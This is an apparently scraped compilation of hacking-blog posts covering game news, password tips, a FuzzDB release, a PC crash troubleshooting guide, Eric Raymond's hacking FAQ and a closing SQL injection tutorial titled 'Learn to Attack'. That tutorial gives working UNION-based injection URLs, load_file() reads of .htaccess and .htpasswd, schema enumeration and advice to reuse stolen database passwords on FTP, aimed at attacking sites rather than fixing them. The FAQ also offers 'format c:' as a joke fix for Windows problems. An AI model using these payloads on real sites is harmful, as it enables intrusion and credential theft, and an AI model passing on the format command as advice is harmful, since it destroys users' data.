The Next Big Thing - Bungie Activision join Forces

Halo is one of my  favorite games and I still duke with my friends in weekend LAN mayhem, the same can be said about Bungie - locked and loaded :) - COD4:MW & MW2 when it comes to gaming . It became bigger this Wednesday when Bungie, the celebrated Halo developer entered into a 10 year “alliance” with gaming biggie Activision, and now the next-big-post-Halo-Bungie-game will be a multiplatform title. As Thomas Tippl, Chief Operating Officer of Activision Blizzard commented -
"Today we are very proud to announce a ground breaking ten year partnership between Bungie, one of the greatest developers in the world and the makers of Halo, with Activision, the number one video game publisher, who will bring the new intellectual property to fans worldwide across all platforms"
In short, the equation goes like this -
The new equation of gaming -
The deal took over an year to finally come to a mutual point of interest, and personally, I can see some real Bungie stuff of Oni quality to be developed outside halo universe.
Meanwhile Bungie is currently preparing itself for Halo: Reach for Xbox 360,self dubbed as the "most ambitious game" it has ever made. Mean while you can enjoy the Halo Reach trailer :)

Like This post ?  You can buy me a Beer :)


How not to get Hacked – Choosing the Right Password

Its a digital nightmare when your password gets hacked. Password compromise = your are fucked, straight away. How not to get Hacked – Choosing the Right Password - theprohack.comAnd if  you do happen to be at an important position in a firm, and unfortunately find yourself the root cause of company’s security problems, its time to learn a few basics of choosing the right password. Be it your Email ID, terminal login, voicemail or anything that uses a generic password protection system,you need to choose a secure password for your digital ventures. Nevertheless, this simple guide is applicable to every netizen online who wants to secure himself by choosing the right password. Cause in the end, its your password that makes it easy, or hard for attackers to gain access to your account.

About Bad Passwords

Poor weak passwords have the following characteristics (if you have even one,make sure to change it) -

  • Password size less than 15 characters
  • Password is a word from dictionary

The password is -

  • Name of family,pet,your favorite videogame character.
  • Computer terms,commands,website name,hardware,software etc.
  • Personal data like birthday,mobile phone numbers, address etc.
  • Any of the above spelled backwards! or succeeded or preceded by a number or letter (password1, 1 password)
  • In short any form of personal stupidity leads to tragic events :P

How to get hacked ?

  • Reveal your password to any one.
  • Reveal it in an email message,phone call,to your boss, give hints to others,share it with friends and co workers.
  • Write it down somewhere.
  • Keep same passwords for all your digital ventures, like emails, voicemails etc

Passwords shall be hard to guess -

In any case, if you want the opposite, follow the opposite :)

Making a STRONG Password

use phrases to form passwords, these are much secure to form and hard to guess.

for eg, the phrase -

“ This is a super secure password and is hard to hack :P ”

will form a password given below by taking the first letter and substituting similar sounding words with numbers. See..its quite hard to hack :)

“ Tiassp&ih2h:P ”

Use numbers, letters, uppercase and lowercase and mix them freely to form you password. make sure its not a dictionary word and DOES NOT CONTAIN any characteristic of weak passwords stated earlier.

A more secure version is to use passphrases to form passwords. A passphrase is a longer version of password and hence its more secure. Make sure its easy to remember,not a famous quotation and hard to guess by intuition

As Clifford Stoll says,

Treat your password like your toothbrush. Don't let anybody else use it, and get a new one every six months

He is damn right..just make sure you change it every month or more often to be secure.

I guess you will now be able to form secure passwords and deploy them fully.


Like This post ?  You can buy me a Beer :)



FuzzDB – Pentest using comprehensive attack patterns

Too much new software is vulnerable to the attack sequences of yesteryear. This suggests a testing approach: a comprehensive set of known attack pattern sequences can be leveraged for use in targeted fuzzing when testing for exploitable conditions in new applications.Fuzzdb is a comprehensive set of known attack pattern sequences, predictable locations, and error messages for FuzzDB – Pentest using comprehensive attack patterns - THEPROHACK.COMintelligent brute force testing and exploit condition identification of web applications.

Many mechanisms of attack used to exploit different web server platforms and applications are triggered by particular meta-characters that are observed in more than one product security advisory. fuzzdb is a database attack patterns known to have caused exploit conditions in the past, categorized by attack type, platform, and application.

Because of the popularity of a small number of server types, platforms, and package formats, resources such as logfiles and administrative directories are typically located in a small number of predictable locations. A comprehensive database of these, sorted by platform type, makes brute force fuzz testing a scalpel-like approach.

Since system errors contain predictable strings, fuzzdb contains lists of error messages to be pattern matched against server output in order to aid detection software security defects.

Primary sources used for attack pattern research:

  • researching old web exploits for repeatable attack strings
  • scraping scanner patterns from http logs
  • various books, articles, blog posts, mailing list threads
  • patterns gleaned from other open source fuzzers and pentest tools
  • analysis of default app installs
  • system and application documentation
  • error messages

It’s like a non-automated open source scanner without the scanner. You can download fuzzdb v1.06 here:

Download fuzzdb-1.06.tgz

Check out via svn: svn checkout fuzzdb-read-only keep FuzzDB updated,type

svn update

to pull the latest updates.


Like This post ?  You can buy me a Beer :)



Apple imposes lifetime ban for purchasing iPads (to a blogger ofcourse)

A blogger who goes by the name of “Protocol snow” has been banned by Apple for buying iPads.The story goes like this, as Apple launched iPads and people went crazy for it, there was a shortage of iPads all over the world. Since Mr Snow was lucky enough to live near an Apple store which had plenty of iPads available, and “coincidently” was a member of NeoGaf gaming forums, he ordered iPads and decided to sell and ship them to his fellow NeoGAFians by covering all the shipping costs,tax,Paypal insurance fees along with the iPad. The prices were quite reasonable and he limited his purchases to no more than 2 per day because he heard that there was a limit per person.
no more Apple iPads for Mr Snow -
Then he went shit out of luck on April 17, when Mr Snow’s fateful visit at Apple store limited his purchases to an end for the rest for his life. The unexpected conversation between Mr Snow (Me) and Apple folks (Guy#1, Guy#2),that concluded his ban went like this -
Me (nonchalantly) — “Is there an issue?”
Guy #2 — “There is a limit to the number of iPads that customers can buy.”
Me (playing dumb) — “Oh, is that right? What’s the limit?”
Guy #2 — “Only 2 per customer.”
Guy #1 — “I’m sorry sir, but you have reached your lifetime limit of iPad purchases and will not be allowed to buy any more.”
Me (anticipating that statement) — “Is the iPad limit per person? Per credit card? Per household?”
Guy #1 — “All I can say is that you have reached your lifetime limit.”
Me — “What does that mean? Can I use a different credit card to buy it? I’m buying this for a friend.”
Guy #1 — “You are not allowed to buy this iPad.”
Me — “Uhh… is it ok if I have a family member or friend come to buy it for me? My reservation doesn’t expire until 6:00 PM.”
Guy #1 — “All I can say is that you have reached your lifetime limit.”
Me (suddenly realizing what he’s saying) — “Wait, what? Lifetime? What does that mean?”
Guy #1 — “All I can say is that you have reached your lifetime limit of iPads and will not be allowed to buy any more.”
Me — “I’m banned from buying iPads? I know there’s a shortage right now, but I can’t buy any more once there’s plenty of stock?”
Guy #1 — “All I can say is that you have reached your lifetime limit.”
Me — “Ok buddy, I’m not going to make a scene so I’m leaving. How many iPads is the limit by the way?”
Guy #1 — “That information is not available.”
Me (looking at Guy #2, who has been silent this whole time) — “He tells me that the limit is two.”
Guy #1 — “I wish I could say but I do not have that information.”
Me — “I’ve already purchased more than 2 iPads. Why didn’t anybody else stop me in the past?”
Guy #1 — “I wish I could say but I do not have that information.”
Me — “Alright, I’ve had enough. Have a good day.”
Guess Apple is tightening its grip on iPad and is reworking its watch on the grey market. Meanwhile, Mr Snow’s blog has been hammered by 240 plus comments and shit load of traffic :)

Like This post ?  You can buy me a Beer :)


Favorite timepass – bashing charlatans at Attrition.Org

Attrition Mascot

While I am not messing up with my pc, watching AVGN, or reading wikipedia, I prefer to be at Attrition.Org which in my opinion is the best place to hangout after any LUG. For those who don't know about Attrition.Org, its basically a “hobby site” that focuses on computer security and mocks the revered security researchers who are basically frauds with illiterate whoring media on their side.

As the description on the site says - ( ) is a computer security web site dedicated to the collection, dissemination and distribution of information about the security industry for anyone interested in the subject. They maintain one of the only open and honest grim look at the industry, reminding everyone that we must strive to be better than we have been historically. Their crusade to expose industry frauds and inform the public about incorrect information in computer security articles is a primary goal of the site.

My favorite section is the charlatans section of the website, where fake security experts are bashed for their fraudulent actions and other “unethical” reasons. My favorite one is the case of Ankit Fadia, the once acclaimed Indian child prodigy and author(though in my opinion, nothing more than a script kiddie, lots of poor journalism is responsible for getting him the place he stands today). 

Additionally, Attrition regularly publishes opinion pieces such as "Security Rants" pointing out problems with the computer security industry.Folks at Attrition are responsible for maintaining one of the biggest list of defaced websites (though they ceased to maintain it after 2001) and maintained Data loss database which records the data breaches at companies.


Like This post ?  You can buy me a Beer :)



Fans go Gaga over Marvel Vs Capcom 3

At Captivate 2010, fighting crossover giant Capcom has announced what fans have been wanting form a long time – Marvel vs Capcom 3. For those who don't know what it is all about, its the series that defined crossover fighting games and is the fifth installment in its series. As usual, the game will feature a whole array of Marvel and Capcom characters including fan favorites Ryu, Morrigan from Capcom fighting roster and Wolverine,Hulk,IronMan from Marvel’s side. The best part? Chris Redfield is included in the upcoming installment and trust me, its going to be awsummmm !!!! MVC3 is the first to feature 3D graphics in its series and like its predecessor, will be featuring a 3-on-3 tag-team based fighting system. The game will be powered by Capcom’s MT framework engine which has previously illustrated its prowess in Resident Evil 5, Devil may Cry 4 and Lost Planet.

Marvel vs Capcom 3 -

On a personal note, I prefer Street Fighter more..but I m a fighting game junkie and I still remember duking out with my friends in Marvel vs Capcom 2 and the whole experience wants some more bashing :)

MVC3 will be released on PS3 and Xbox 360..Who knows it might also be released on PC too, as its powered by MT framework and we already have Street Fighter 4 with us.

You can check out the cool trailer below :)


Like This post ?  You can buy me a Beer :)



Create solar eclipse in photoshop

This a tutorial to create an eclipse artificially in Photoshop,originally written by my friend Satwik Sharma long time ago. I guess I m getting less time to post articles nowadays so it might be okay to bring up some lesser read articles of my blog into spotlight. Jokes apart, lets get to business. This Solar eclispse can be used as a great background too. Even beginners should try this tutorial. You will get to know some Tools and their use. It's not at all difficult. I've tried to make it as simple as possible for even beginners to understand.So here goes. Step 1 : Open a New 640 x 400 pixel document by going to File>New.

Step 2 : Click the Paint Bucket Tool. Set the Background colour to Black. (It is so by default).

Step 3 : The White Layer has been filled with Black using the Paint Bucket Tool.

Step 4 : Click the New Layer Button shown. It will create a new layer.

Step 5 : The New Layer has been created.
Step 6 : Select the Elliptical Marque Tool by clicking it.

Step 7 : Press Shift on the keyboard and drag. A perfect circle will be created.

Step 8 : Now set the Foreground Colour to White. Clicking on the small arrow switches between the Foreground and Background colour. Select the Paint Bucket Tool again.

Step 9 : This is how it should look after filing the circle with White.
Step 10 : Go to Select>Deselect to deselect the Elliptical Marque Tool

Step 11 : The Opacity and Fill Sliders are in the Layers/Chanels/Paths pallette at bottom right of Photoshop. Drag the Fill slider to the extreme left. This will cause the white circle to disappear.
Step 12 : Go to Layer>Layer Style>Outer Glow as shown.
Step 13 : Drag the Size Slider to the right after this dialogue box opens. There is no hard and fast rule how much you should drag. It should satisfy you.
Step 14 : This is how it should looks after clicking OK. Now REPEAT this step.
Step 15 : This is how it look after repeating the above step. The glow is more diffused now.

Step 16 : Now go to Layer>Layer Style>Inner Glow

Step 17 : In the dialogue box which opens drag the Size slider to the right till you are satisfied with the result. Click OK.

Step 18 : Now go to Layers/Channels/Paths pallete. Press SHIFT on the keyboard to select both Background and Layer 1.
Step 19 : Now right click as shown. It will bring up the dialogue box as shown. Click MERGE LAYERS.
Step 20 : The Layers have been merged.

Step 21 : Now click the New Layer Button. It will create a new layer as shown.

Step 22 : Double click the background. The background layer cannot be edited. Therefore double click it to make a copy of it.
Step 23 : This dialogue box opens click OK.

Step 24 : Now drag Layer 1 below Layer 0 as shown. Now Fill Layer 1 with Black using the Paint Bucket Tool.

Step 25 : Now click Layer 0 and click the Quick Mask button. It will create a Quick Mask on Layer 0.

Step 26 : Now click the Gradient Tool shown above.

Step 27 : Make sure the Black to White gradient is selected. You can select it by clicking it if it is not selected.

Step 28 : Now drag the Gradient Tool from the bottom right to the middle as shown.
Step 29 : This is how it looks after applying the gradient. A few more steps remain. Just be patient.

Step 30 : Now just as in Step 18 and 19 select both the layers by clicking on the layers while pressing SHIFT key. Then Merge both layers.
Step 31 : Now go to Filter>Render>lens Flare.

Step 32 : When the above dialogue box opens choose 50-300mm Zoom. The first one and click ok. That is all.
This is the completed image and you can flaunt it to your friends :)

Like This post ?  You can buy me a beer :)


New Virus Attack - Blogger-Wordpress compromised ?

As I was checking several blogs and websites today, i found that several of them redirected me to either or a bing search page for “freevirusscan” .

New Virus Attack - Blogger-Wordpress compromised ? -

Several blogger and wordpress blogs were seemed to have been affected. In my case I visited this blog (gosh..its a blogger blog) and this site was redirected to -

which first displayed a window almost identical to a standard "My computer" screen on a windows pc and looked like the typical type of windows malware. It alerted me of various viruses/Trojans (downloader.win32.agent etc.) detected on my computer, followed by a prompt to install "System Security Antivirus" and such by clicking "ok". With no option to close the window, and with no other active windows, I clicked cancel for no result as I got a message that windows security center recommends it as an install and hence the cycle repeats.

When I got rid of that page and revisited it,the page was gone and instead redirected me to a bing search page for search term “freevirusscan” .

Blogger-Wordpress compromised ? Virus Attack ? -


On closer inspection I found out that affected blogs load a script just before the </body> tag with no recognizable pattern (atleast for me). Also I monitored my cookies and found that after being redirected to bing,a cookie is set to prevent the user from being redirected for 20 days.

Several wordpress blogs also displayed the same vulnerability. On later googling I found a user in apple forum about the same problem. A new virus attack on Wordpress/Blogger ? Seems so as I was running Linux and seemed to have no malware installed on my Linux machine. Tested this on a clean windows machine and for positive results.

Keep your eyes open folks..


Like This post ?  You can buy me a coffee :)




Top reasons Why PC’s Crash – Curing Blue Screen of Death

“Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."
You have just been struck by the Blue Screen of Death.

Blue Screen of Death -

Anyone who uses Microsoft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?
Lets get down on it…

Hardware conflict
The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.
For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.
If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:
* Start-Settings-Control Panel-System-Device Manager.
Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.
Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.
Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).
When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.
To be fair to Microsoft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

Bad Ram
Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.
But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.
One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.
Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.
EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programs.

BIOS settings
Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.
Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.
A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.
Microsoft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

Hard disk drives
After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to
* Start-Programs-Accessories-System Tools-Disk Defragmenter
This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.
The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).
Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to
* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.
Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.
Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to
* Start-Programs-Accessories-System Tools-ScanDisk
Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

Fatal OE exceptions and VXD errors
Fatal OE exception errors and VXD errors are often caused by video card problems.These can often be resolved easily by reducing the resolution of the video display. Go to
* Start-Settings-Control Panel-Display-Settings
Here you should slide the screen area bar to the left. Take a look at the color settings on the left of that window. For most desktops, high color 16-bit depth is adequate.
If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to
* Start-Settings-Control Panel-System-Device Manager
Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.
If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.
The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.
Another useful way to resolve video problems is to go to
* Start-Settings-Control Panel-System-Performance-Graphics
Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).
Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to
* Start-Settings-Control Panel-Add/Remove Programs
Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.
A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.
An excellent antivirus program is McAfee Virus Scan by Network Associates ( Another is Norton Antivirus 2000, made by Symantec (

The action of sending a document to print creates a bigger file, often called a postscript file.
Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.
If the printer is trying to print unusual characters, these might not be recognized, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the program in the System Registry and leaves the way clear for a completely fresh copy.
The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Registry Cleaner to clean up the System Registry and remove obsolete entries. 
Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.
Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.
Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.
Remember to restore all the BIOS settings back to their former settings following installation.

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.
One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from or
CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

Power supply problems
With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.
If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.
It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

I hope now you will be able to rectify your problems. keep reading and learning.

posted by XERO . Anonymous Author

HACKING FAQ - Solution to the ultimate beginners problems

HACKING FAQ - Solution to the ultimate beginners problems

Eric S. Raymond throw some light on the most asked questions asked by amateurs and answers them in the most appropriate way. This is the ultimate hacking FAQ to go with if you are beggining to learn the art.  This FAQ focuses on hacking ethics and right way to start and pursue your passion for it if you are really serious. 

Interested ? Read on..

HACKING - Frequently Asked Questions

Q: Will you teach me how to hack?

Since first publishing this page, I've gotten several requests a week (often several a day) from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do this; my own hacking projects take up 110% of my time.
Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know.
Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions.

Q: How can I get started, then?

The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started.

Q: When do you have to start? Is it too late for me to learn?

Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions.

Q: How long will it take me to learn to hack?

That depends on how talented you are and how hard you work at it. Most people can acquire a respectable skill set in eighteen months to two years, if they concentrate. Don't think it ends there, though; if you are a real hacker, you will spend the rest of your life learning and perfecting your craft.

Q: Are Visual Basic or Delphi good languages to start with?

No, because they're not portable. There are no open-source implementations of these languages, so you'd be locked into only those platforms the vendor chooses to support. Accepting that kind of monopoly situation is not the hacker way.
Visual Basic is especially awful. The fact that it's a proprietary Microsoft language is enough to disqualify it, and like other Basics it's a poorly-designed language that will teach you bad programming habits.
One of those bad habits is becoming dependent on a single vendor's libraries, widgets, and development tools. In general, any language that isn't supported under at least three different vendors' operating systems is a poor one to learn to hack in.

Q: Would you help me to crack a system, or teach me how to crack?

No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness.

Q: I've been cracked. Will you help me fend off further attacks?

No. Every time I've been asked this question so far, it's been from somebody running Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, it's like trying to bail out a boat with a sieve. The only reliable prevention is to switch to Linux or some other operating system with real security.

Q: I'm having problems with my Windows software. Will you help me?

Yes. Go to a DOS prompt and type "format c:". The problems you are experiencing will cease within a few minutes.

Q: Where can I find some real hackers to talk with?

The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at Metalab).
(I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.)

Q: Can you recommend useful books about hacking-related subjects?

I maintain a Linux Reading List HOWTO that you may find helpful.

Q: What language should I learn first?

HTML, if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide.
But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, and Perl is still more popular than Python, but it's harder to learn and (in my opinion) less well designed. There are resources for programming beginners using Python in the Web.
C is really important, but it's also much more difficult than either Python or Perl. Don't try to learn it first.
Windows users, do not settle for Visual Basic. It will teach you bad habits, and it's not portable off Windows. Avoid.

Q: Do I need to hate and bash Microsoft?

No, you don't. Not that Microsoft isn't loathsome, but there was a hacker culture long before Microsoft and there will still be one when Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code -- that will bash Microsoft quite sufficiently without polluting your karma.

Q: But won't open-source software leave programmers unable to make a living?

This seems unlikely -- so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be free after it's done. And, no matter how much "free" software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages.

Q: How can I get started? Where can I get a free Unix?

Elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now... 

Eric S. Raymond & Elf Qrin . UNKNOWN COMPILATION . X.E.R.O

SQL Injection – Learn to Attack

Hi folks..This time I m posting a good sql injection tutorial by End3r, which I found quite interesting to read and a gem SQL Injection – Learn to Attack to share. This SQL injection tutorial will clear your most of sql injection doubts and will cleanly phase in an attack strategy for you.

SQL Injection is defined by as:

"The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."

Background Information

  • It is considered the most common web vulnerability today
  • It's a flaw in the web application--not the db, or the server
  • Can be injected into: Cookies, Forms, and URL parameters

Lesson Facts

  • This lesson uses MySQL syntax for all examples.
  • This lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
  • This lesson only provides sql injection examples for url parameters such it is such a large subject on it's own
  • This lesson gives small examples of filter evasion techniques

The Lesson

Some commands you will need to know:

'union all select' : combines two or more select statements into one query and returns all rows

'order by' : used to sort rows after a select statement is executed

'load_file()' : loads a local file from the site or server examples would be .htaccess or /etc/passwd

'char()' : used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in conjunction with load_file

'concat()' : combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (You will understand better later)

'—' : a comment

'/*' : another type of comment

Injection SQL Queries into URL Parameters

So you've found a site: ''

and want to test if it's vulnerable to SQL Injections. Begin by checking if you can execute some of your own queries, so try:

/index.php?id=5 and 1=0--

If after executing the above statement, nothing has happened and the page has remained the same, you can try:


If neither of those work, for the purposes of this tutorial move on to another site. Otherwise, if a blank page showed up you just might be in luck!

Now we want to find how many columns and which ones are showing when the select statement is executed so we use:

/index.php?id=5 order by 20

If you get an error decrement the number 20, if there is no error continue incrementing until you get one and then the number just before your error is the number of columns in the table you're selecting from.


/index.php?id=5 order by 15 <--returns no error, but /index.php?id=5 order by 16

returns an error, then we know that there are 15 columns in our select statement.

The next statement will null the id=5 so the script only executes our commands and not it's own, and show us which columns we can extract data from:

/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

The comment comments out anything the script would append to the end of the statement so that only our statement is looked at.

So now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. For this example let's pretend columns 5, 7, and 9 are showing.

Now we can begin gathering information!

/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,1 3,14,15--

As you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column? This is where concat() comes in:

/index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58) ,version()),6,7,8,9,10,11,12,13,14,15--

Now look at your page, user(), database(), and version() are all in one place, and are separated by a colon this demonstrates the use of concat() and char().

The user() will usually give something like username@localhost, but you may get lucky and get username@ipaddresshere, in this instance you can try to brute force the FTP login. The version would help you look up exploits for that version of the database() in use--but only if you're a skiddy!

Before we can check if we have load_file perms, we must get an FPD (Full Path Disclosure) so we know exactly where the files are located that we're trying to open. Below are some methods to get an FPD:


You could attempt to Google the full path of the site by trying something like "/home/sitename" and hoping that you'll find something in Google

Session Cookie Trick

Thanks to haZed at In the url type:

'java script:void(document.cookie="PHPSESSID=");'

This will give a session_start() error and an FPD.

Now we will attempt to use load_file(), this example will load the .htaccess file, make sure you know the file you're trying to load actually exists or you may miss out on your opportunity to realize what great perms you have:

/index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15--

If you see the .htaccess file, congrats! You have load_file() perms. Now try to load include files such as for database usernames and passwords, hoping that the admin is dumb enough to use the same username and password for ftp. Another idea would be to load .htpasswd after finding it's location from .htaccess and then logging in to all the password-protected areas that you want to on the site.

If you don't see the .htaccess file, I will include one more way to extract info by using sql injections.

Using information_schema.tables

So you don't have load_file() perms? No problem, we can check for information_schema.tables.

1) 'table_name' is the name of a table that exists in all information_schema tables on every site:

/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--

If the site is showing information_schema.tables, the words 'CHARACTER_SETS' will appear in column 5. What can I do with CHARACTER_SETS you might be wondering. Well, nothing that I'm going to show you, but you can find out other tables that exist on the site. The information_schema.tables contains a list of every table in the database on the site, so you can pull up the table username and maybe password if they exist...Then what do you think the information_schema.columns hold? That's right, a list of all the columns on the site. So rather than using just the above injection you could try any of the following:

-/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables—

Selects all 'distinct' table names from information_schema.tables, meaning it will print out all tables at one time

-/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6, 7,8,9,10,11,12,13,14,15 from information_schema.columns—

Selects all tables and columns that go with each table seperated by a colon

2) If none of the above queries give you anything except for 'CHARACTER_SETS' you will have to use enumeration to determine the names of the other tables:

/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name != "CHARACTER_SETS"--

Then it would show the next table in line so you would modify the above to say:

where table_name != "CHARACTER_SETS" and table_name != "nexttableinline"--
